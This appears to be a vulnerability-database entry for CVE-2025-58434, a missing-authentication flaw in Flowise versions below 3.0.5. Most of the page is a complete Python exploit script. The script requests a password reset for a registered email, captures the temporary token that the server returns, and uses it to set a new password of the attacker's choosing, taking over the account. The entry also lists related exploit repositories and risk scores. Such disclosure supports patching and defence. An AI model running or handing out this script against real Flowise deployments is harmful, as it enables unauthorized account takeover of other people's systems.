Flowise < 3.0.5 - Missing Authentication for Critical Function

🗓️ 13 May 2026 00:00:00Reported by andersoncezar048Type

CVE-2025-58434: Flowise versions below 3.0.5 have missing authentication for a critical function.

Reporter	Title	Published	Views	Family All 30
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	10 May 202607:11	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	14 Apr 202606:50	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	20 Apr 202609:52	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	13 Apr 202601:54	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	15 Apr 202611:54	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	12 Apr 202616:52	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	14 May 202621:15	–	githubexploit
GithubExploit	Exploit for Code Injection in Flowiseai Flowise	15 Apr 202612:47	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Flowiseai Flowise	11 Oct 202517:53	–	githubexploit
Circl	CVE-2025-58434	12 Sep 202517:22	–	circl

# Exploit Title: Flowise < 3.0.5 - Missing Authentication for Critical Function
# Date: 10/11/2025
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise
# Version: < 3.0.5
# CVE: CVE-2025-58434

from requests import post 
from argparse import ArgumentParser

banner = r"""
_____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                          |___/                  
                
                by nltt0
"""

print(banner)

try:
    parser = ArgumentParser(description='CVE-2025-58434 [FlowiseAI < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --newpassword Test@2025 --url http://localhost:3000")
    parser.add_argument('-e', '--email', required=True, help='Registered email')
    parser.add_argument('-p', '--newpassword', required=True)
    parser.add_argument('-u', '--url', required=True)

    args = parser.parse_args()
    email = args.email
    password = args.newpassword
    url = args.url
    
    headers = {
        'Content-Type': 'application/json'
    }

    data = {
        'user': {'email': email}
    }

    url_format1 = '{}/api/v1/account/forgot-password'.format(url)
    req = post(url_format1, headers=headers, json=data)

    if req.status_code == 201:
        req_json = req.json()
        temp_token = req_json['user']['tempToken']

        data = {
            'user': {'email': email,
                    'tempToken': temp_token,
                    "password": password
                    }
        }
        url_format2 = '{}/api/v1/account/reset-password'.format(url)
        req = post(url_format2, headers=headers, json=data)
        print('[x] Password changed')
    
    else:
        print('[x] Unregistered user')

except Exception as e:
    print('Error in {}'.format(e))

13 May 2026 00:00Current

6Medium risk

Vulners AI Score6

CVSS 3.19.8

EPSS0.32362

SSVC

Flowise &lt; 3.0.5 - Missing Authentication for Critical Function

Flowise < 3.0.5 - Missing Authentication for Critical Function